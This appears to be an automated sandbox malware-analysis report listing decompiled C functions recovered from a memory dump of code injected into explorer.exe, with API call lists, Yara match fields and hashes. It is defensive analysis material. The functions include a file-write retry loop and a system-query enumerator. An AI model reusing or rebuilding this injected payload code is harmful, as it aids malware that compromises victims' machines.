                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E02F8B2FE(WCHAR* __ecx) {
                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                              				_t2 = _t5 + 1; // 0x1
                                                                                                                                                                                              				asm("sbb ecx, ecx");
                                                                                                                                                                                              				return _t5 &  ~_t2;
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,02F8B3E6,00000000,00000400,00000000,00000000,?,02F90BBE,00000000,00000000), ref: 02F8B312
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F88BDE(long _a4) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = RtlAllocateHeap( *0x2f9f900, 8, _a4); // executed
                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F88BC9() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                                              				 *0x2f9f900 = _t1;
                                                                                                                                                                                              				return _t1;
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,02F86502), ref: 02F88BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E02F90B23(void* __edx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                                              				char _t28;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                              				char _t38;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                              				intOrPtr _t51;
                                                                                                                                                                                              				intOrPtr* _t61;
                                                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t27 =  *0x2f9f7e4; // 0x508fb48
                                                                                                                                                                                              				_t28 = E02F88BDE( *((intOrPtr*)(_t27 + 4))); // executed
                                                                                                                                                                                              				_v12 = _t28;
                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                              					_t61 =  *0x2f9f7e4; // 0x508fb48
                                                                                                                                                                                              					if( *((intOrPtr*)(_t61 + 4)) > 0x400) {
                                                                                                                                                                                              						E02F88CBB(_t28,  *_t61, 0x400);
                                                                                                                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              						_t37 = E02F8109A(_t61, 0x294);
                                                                                                                                                                                              						_t64 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              						asm("sbb ecx, ecx");
                                                                                                                                                                                              						_t38 = E02F89DF2(( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8, ( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8);
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_t37);
                                                                                                                                                                                              						_v24 = _t38;
                                                                                                                                                                                              						_push(0x2f9c9a0);
                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                              						_t39 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              						_push(0x2f9c9a0);
                                                                                                                                                                                              						_v20 = E02F89A5A(_t39 + 0x1020);
                                                                                                                                                                                              						_t42 = E02F8B3C7(_t41,  &_v8); // executed
                                                                                                                                                                                              						_v16 = _t42;
                                                                                                                                                                                              						E02F88BAF( &_v24);
                                                                                                                                                                                              						E02F88BAF( &_v20);
                                                                                                                                                                                              						_t73 = _v16;
                                                                                                                                                                                              						_t79 = _t78 + 0x3c;
                                                                                                                                                                                              						_t71 = _v8;
                                                                                                                                                                                              						if(_v16 != 0 && _t71 > 0x400) {
                                                                                                                                                                                              							_t51 =  *0x2f9f7e4; // 0x508fb48
                                                                                                                                                                                              							if(_t71 >=  *(_t51 + 4)) {
                                                                                                                                                                                              								_t71 =  *(_t51 + 4);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E02F88CBB(_v12 + 0x400, _t73 + 0x400, _t71 - 0x400);
                                                                                                                                                                                              							_t71 = _v8;
                                                                                                                                                                                              							_t79 = _t79 + 0xc;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E02F88BF4( &_v16, _t71);
                                                                                                                                                                                              						E02F88BF4( &_v20, 0xfffffffe);
                                                                                                                                                                                              						_t28 = _v12;
                                                                                                                                                                                              						_t78 = _t79 + 0x10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t75 = 0;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t30 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              						_t32 = E02F8B467(_t30 + 0x228, _t28, 0x1000); // executed
                                                                                                                                                                                              						_t78 = _t78 + 0xc;
                                                                                                                                                                                              						if(_t32 >= 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						Sleep(1);
                                                                                                                                                                                              						_t75 = _t75 + 1;
                                                                                                                                                                                              						if(_t75 < 0x2710) {
                                                                                                                                                                                              							_t28 = _v12;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E02F88BF4( &_v12, 0); // executed
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}
























                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • Sleep.KERNELBASE(00000001,?,00000000,00000000,?,?,?,?,02F90A51,?,?,?,02F90E19,00000000), ref: 02F90C54
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeapSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4201116106-0
                                                                                                                                                                                              • Opcode ID: 498b6302ce9be5ea929d5869e5c9fdce9f7fbb79aed55769d37cd122262dcf06
                                                                                                                                                                                              • Instruction ID: b86190741b61d5635fa6bd2e1116511bbf9786a16ec22d1bf2fea2e1d433ee52
                                                                                                                                                                                              • Opcode Fuzzy Hash: 498b6302ce9be5ea929d5869e5c9fdce9f7fbb79aed55769d37cd122262dcf06
                                                                                                                                                                                              • Instruction Fuzzy Hash: B04183B1E00109ABEB14EBA4CC85FEEF7A9EF44384F544669E705E7280DA35A905CB54
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E02F86247(void* __ecx, void* __eflags) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              				WCHAR* _t3;
                                                                                                                                                                                              				WCHAR* _t4;
                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                              				signed int _t8;
                                                                                                                                                                                              				WCHAR* _t10;
                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = E02F85CE2(__eflags); // executed
                                                                                                                                                                                              				if(_t2 == 0) {
                                                                                                                                                                                              					_t14 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					_t3 = E02F85EDD( *((intOrPtr*)(_t14 + 0xac)), 0, __eflags); // executed
                                                                                                                                                                                              					 *0x2f9f840 = _t3;
                                                                                                                                                                                              					__eflags = _t3;
                                                                                                                                                                                              					if(_t3 != 0) {
                                                                                                                                                                                              						_t4 = E02F8A9D6();
                                                                                                                                                                                              						__eflags = _t4;
                                                                                                                                                                                              						if(_t4 == 0) {
                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                              							return 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t6 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              							_t8 = lstrcmpiW(_t6 + 0x228, _t4);
                                                                                                                                                                                              							asm("sbb eax, eax");
                                                                                                                                                                                              							_t10 =  ~_t8 + 1;
                                                                                                                                                                                              							__eflags = _t10;
                                                                                                                                                                                              							return _t10;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t11 = 2;
                                                                                                                                                                                              						return _t11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t12 = 3;
                                                                                                                                                                                              					return _t12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}













                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8237c9edbfa64e39d87d4788b78997a1343b49d3b4accef4479dab4415b7e4d6
                                                                                                                                                                                              • Instruction ID: 0d9a1068e161d897bcb0bb06a9199ae2d5cd674504e87c05ec0a66202674c73a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8237c9edbfa64e39d87d4788b78997a1343b49d3b4accef4479dab4415b7e4d6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 17E092B0F912055BEF60BB39EC58F22F3DEAB813C5F258AB0A215DA084EF20C411D900
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E02F8EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                              				char* _v72;
                                                                                                                                                                                              				signed short _v80;
                                                                                                                                                                                              				signed int _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v616;
                                                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                                                              				char _t165;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				signed int _t173;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                                                              				signed int _t188;
                                                                                                                                                                                              				signed int _t192;
                                                                                                                                                                                              				intOrPtr* _t193;
                                                                                                                                                                                              				intOrPtr _t200;
                                                                                                                                                                                              				intOrPtr* _t205;
                                                                                                                                                                                              				signed int _t207;
                                                                                                                                                                                              				signed int _t209;
                                                                                                                                                                                              				intOrPtr* _t210;
                                                                                                                                                                                              				intOrPtr _t212;
                                                                                                                                                                                              				intOrPtr* _t213;
                                                                                                                                                                                              				signed int _t214;
                                                                                                                                                                                              				char _t217;
                                                                                                                                                                                              				signed int _t218;
                                                                                                                                                                                              				signed int _t219;
                                                                                                                                                                                              				signed int _t230;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				signed int _t242;
                                                                                                                                                                                              				signed int _t243;
                                                                                                                                                                                              				signed int _t244;
                                                                                                                                                                                              				signed int _t245;
                                                                                                                                                                                              				intOrPtr* _t247;
                                                                                                                                                                                              				intOrPtr* _t251;
                                                                                                                                                                                              				signed int _t252;
                                                                                                                                                                                              				intOrPtr* _t253;
                                                                                                                                                                                              				void* _t255;
                                                                                                                                                                                              				intOrPtr* _t261;
                                                                                                                                                                                              				signed int _t262;
                                                                                                                                                                                              				signed int _t283;
                                                                                                                                                                                              				signed int _t289;
                                                                                                                                                                                              				char* _t298;
                                                                                                                                                                                              				void* _t320;
                                                                                                                                                                                              				signed int _t322;
                                                                                                                                                                                              				intOrPtr* _t323;
                                                                                                                                                                                              				intOrPtr _t324;
                                                                                                                                                                                              				signed int _t327;
                                                                                                                                                                                              				intOrPtr* _t328;
                                                                                                                                                                                              				intOrPtr* _t329;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                              				_v60 = _v60 & 0x00000000;
                                                                                                                                                                                              				_v56 = __edx;
                                                                                                                                                                                              				_v100 = __ecx;
                                                                                                                                                                                              				_t159 = E02F8E400(__ecx);
                                                                                                                                                                                              				_t251 = _t159;
                                                                                                                                                                                              				_v104 = _t251;
                                                                                                                                                                                              				if(_t251 == 0) {
                                                                                                                                                                                              					return _t159;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t320 = E02F88BDE(0x10);
                                                                                                                                                                                              				_v36 = _t320;
                                                                                                                                                                                              				_pop(_t255);
                                                                                                                                                                                              				if(_t320 == 0) {
                                                                                                                                                                                              					L53:
                                                                                                                                                                                              					E02F88BF4( &_v60, 0xfffffffe);
                                                                                                                                                                                              					E02F8E4B4( &_v104);
                                                                                                                                                                                              					return _t320;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t165 = E02F89DF2(_t255, 0x3a7);
                                                                                                                                                                                              				 *_t328 = 0xae7;
                                                                                                                                                                                              				_v52 = _t165;
                                                                                                                                                                                              				_t166 = E02F89DF2(_t255);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_v20 = _t166;
                                                                                                                                                                                              				_push(_t166);
                                                                                                                                                                                              				_push(_a4);
                                                                                                                                                                                              				_t322 = E02F89A5A(_t165);
                                                                                                                                                                                              				_v60 = _t322;
                                                                                                                                                                                              				E02F88BAF( &_v52);
                                                                                                                                                                                              				E02F88BAF( &_v20);
                                                                                                                                                                                              				_t329 = _t328 + 0x20;
                                                                                                                                                                                              				if(_t322 != 0) {
                                                                                                                                                                                              					_t323 = __imp__#2;
                                                                                                                                                                                              					_v40 =  *_t323(_t322);
                                                                                                                                                                                              					_t173 = E02F89DF2(_t255, 0x886);
                                                                                                                                                                                              					_v20 = _t173;
                                                                                                                                                                                              					_v52 =  *_t323(_t173);
                                                                                                                                                                                              					E02F88BAF( &_v20);
                                                                                                                                                                                              					_t324 = _v40;
                                                                                                                                                                                              					_t261 =  *_t251;
                                                                                                                                                                                              					_t252 = 0;
                                                                                                                                                                                              					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                                              					__eflags = _t178;
                                                                                                                                                                                              					if(_t178 != 0) {
                                                                                                                                                                                              						L52:
                                                                                                                                                                                              						__imp__#6(_t324);
                                                                                                                                                                                              						__imp__#6(_v52);
                                                                                                                                                                                              						goto L53;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t262 = _v32;
                                                                                                                                                                                              					_v28 = 0;
                                                                                                                                                                                              					_v20 = 0;
                                                                                                                                                                                              					__eflags = _t262;
                                                                                                                                                                                              					if(_t262 == 0) {
                                                                                                                                                                                              						L49:
                                                                                                                                                                                              						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                                              						__eflags = _t252;
                                                                                                                                                                                              						if(_t252 == 0) {
                                                                                                                                                                                              							E02F88BF4( &_v36, 0);
                                                                                                                                                                                              							_t320 = _v36;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *(_t320 + 8) = _t252;
                                                                                                                                                                                              							 *_t320 = E02F898BD(_v100);
                                                                                                                                                                                              							 *((intOrPtr*)(_t320 + 4)) = E02F898BD(_v56);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L52;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                                              						__eflags = _t186;
                                                                                                                                                                                              						if(_t186 != 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v16 = 0;
                                                                                                                                                                                              						_v48 = 0;
                                                                                                                                                                                              						_v12 = 0;
                                                                                                                                                                                              						_v24 = 0;
                                                                                                                                                                                              						__eflags = _v84;
                                                                                                                                                                                              						if(_v84 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t187 = _v28;
                                                                                                                                                                                              						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                                              						__eflags = _t188;
                                                                                                                                                                                              						if(_t188 >= 0) {
                                                                                                                                                                                              							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                                              							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                                              							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                                              							_t253 = _t46;
                                                                                                                                                                                              							_t327 = _t252 << 3;
                                                                                                                                                                                              							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                                              							_t192 = E02F88C72(_t327, _t47);
                                                                                                                                                                                              							__eflags = _t192;
                                                                                                                                                                                              							if(_t192 == 0) {
                                                                                                                                                                                              								__imp__#16(_v24);
                                                                                                                                                                                              								_t193 = _v28;
                                                                                                                                                                                              								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                                              								L46:
                                                                                                                                                                                              								_t252 = _v20;
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                                              							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E02F88BDE( *(_t327 +  *_t253) << 3);
                                                                                                                                                                                              							_t200 =  *_t253;
                                                                                                                                                                                              							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                                              							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                                              								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                                              								E02F88BF4(_t136, 0);
                                                                                                                                                                                              								E02F88BF4( &_v36, 0);
                                                                                                                                                                                              								__imp__#16(_v24);
                                                                                                                                                                                              								_t205 = _v28;
                                                                                                                                                                                              								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                                              								_t320 = _v36;
                                                                                                                                                                                              								goto L46;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t207 = _v16;
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_v12 = _t207;
                                                                                                                                                                                              								__eflags = _t207 - _v48;
                                                                                                                                                                                              								if(_t207 > _v48) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              								_t209 =  &_v12;
                                                                                                                                                                                              								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                                              								__eflags = _t209;
                                                                                                                                                                                              								if(_t209 < 0) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t212 = E02F898BD(_v44);
                                                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                                              								_t213 = _v28;
                                                                                                                                                                                              								_t281 =  *_t213;
                                                                                                                                                                                              								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                              								__eflags = _t214;
                                                                                                                                                                                              								if(_t214 < 0) {
                                                                                                                                                                                              									L39:
                                                                                                                                                                                              									__imp__#6(_v44);
                                                                                                                                                                                              									_t207 = _v12 + 1;
                                                                                                                                                                                              									__eflags = _t207;
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v92 = E02F89DF2(_t281, 0xb28);
                                                                                                                                                                                              								 *_t329 = 0x83f;
                                                                                                                                                                                              								_t217 = E02F89DF2(_t281);
                                                                                                                                                                                              								_t283 = _v80;
                                                                                                                                                                                              								_v96 = _t217;
                                                                                                                                                                                              								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                              								__eflags = _t218 - 0xb;
                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                              									_t219 = _t218 - 0x10;
                                                                                                                                                                                              									__eflags = _t219;
                                                                                                                                                                                              									if(_t219 == 0) {
                                                                                                                                                                                              										L35:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E02F88BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											L38:
                                                                                                                                                                                              											E02F88BAF( &_v92);
                                                                                                                                                                                              											E02F88BAF( &_v96);
                                                                                                                                                                                              											__imp__#9( &_v80);
                                                                                                                                                                                              											goto L39;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%d");
                                                                                                                                                                                              										L37:
                                                                                                                                                                                              										_push(0xc);
                                                                                                                                                                                              										_push(_t289);
                                                                                                                                                                                              										E02F89E51();
                                                                                                                                                                                              										_t329 = _t329 + 0x10;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t230 = _t219 - 1;
                                                                                                                                                                                              									__eflags = _t230;
                                                                                                                                                                                              									if(_t230 == 0) {
                                                                                                                                                                                              										L33:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E02F88BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%u");
                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t235 = _t230 - 1;
                                                                                                                                                                                              									__eflags = _t235;
                                                                                                                                                                                              									if(_t235 == 0) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t235 == 1;
                                                                                                                                                                                              									if(_t235 == 1) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									L28:
                                                                                                                                                                                              									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                              									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                              										_v88 = E02F89DF2(_t283, 0xe0a);
                                                                                                                                                                                              										E02F89E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                              										E02F88BAF( &_v88);
                                                                                                                                                                                              										_t329 = _t329 + 0x18;
                                                                                                                                                                                              										_t298 =  &_v616;
                                                                                                                                                                                              										L31:
                                                                                                                                                                                              										_t242 = E02F898BD(_t298);
                                                                                                                                                                                              										L32:
                                                                                                                                                                                              										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t242 = E02F8E92E( &_v80);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									__eflags = _v72 - 0xffff;
                                                                                                                                                                                              									_t298 = L"TRUE";
                                                                                                                                                                                              									if(_v72 != 0xffff) {
                                                                                                                                                                                              										_t298 = L"FALSE";
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t243 = _t218 - 1;
                                                                                                                                                                                              								__eflags = _t243;
                                                                                                                                                                                              								if(_t243 == 0) {
                                                                                                                                                                                              									goto L38;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t244 = _t243 - 1;
                                                                                                                                                                                              								__eflags = _t244;
                                                                                                                                                                                              								if(_t244 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t245 = _t244 - 1;
                                                                                                                                                                                              								__eflags = _t245;
                                                                                                                                                                                              								if(_t245 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t245 != 5;
                                                                                                                                                                                              								if(_t245 != 5) {
                                                                                                                                                                                              									goto L28;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t298 = _v72;
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__imp__#16(_v24);
                                                                                                                                                                                              							_t210 = _v28;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                              							_t252 = _v20;
                                                                                                                                                                                              							L42:
                                                                                                                                                                                              							_t262 = _v32;
                                                                                                                                                                                              							_t252 = _t252 + 1;
                                                                                                                                                                                              							_v20 = _t252;
                                                                                                                                                                                              							__eflags = _t262;
                                                                                                                                                                                              							if(_t262 != 0) {
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
